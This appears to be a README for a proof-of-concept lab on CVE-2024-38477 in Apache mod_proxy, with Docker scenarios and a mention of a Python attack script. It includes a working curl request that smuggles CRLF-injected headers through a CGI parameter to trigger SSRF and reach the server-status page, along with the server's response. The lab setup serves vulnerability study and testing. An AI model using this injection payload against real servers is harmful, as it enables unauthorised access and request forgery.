# Introduction
This project provides a write-up regarding the **CVE-2024-38477**. To avoid to crash the production environment, the project contains two scenarios with the Apache2's mod_proxy vulnerable. These scenarios can be deployed with Docker.

This project contain a **Proof of Concept** with a python script for executing the attack against the server.

## Scenarios
### Scenario 1
The first scenario is a Perl scripts which can be execute with the Apache's mod CGI. For testing, I created a Perl script which can list all directories and files in the path specified in argument. The scenario can be deployed with Docker:

```
$ docker build -t cve-cgi scenario1/
$ docker run -p 8080:80 cve-cgi
```

With a simply curl, you can create a SSRF attack to the Apache server and to bypass the ACL:

```
$ curl "http://localhost:8080/cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for localhost (via 172.17.0.2)</h1>
```

### Scenario 2
The second scenario is a Python scripts executed with the CGI module. 

## PoC
The Python script **cve.py** generates a new hostname using random values (ASCII letters, digits, and special characters) and sends it to the server.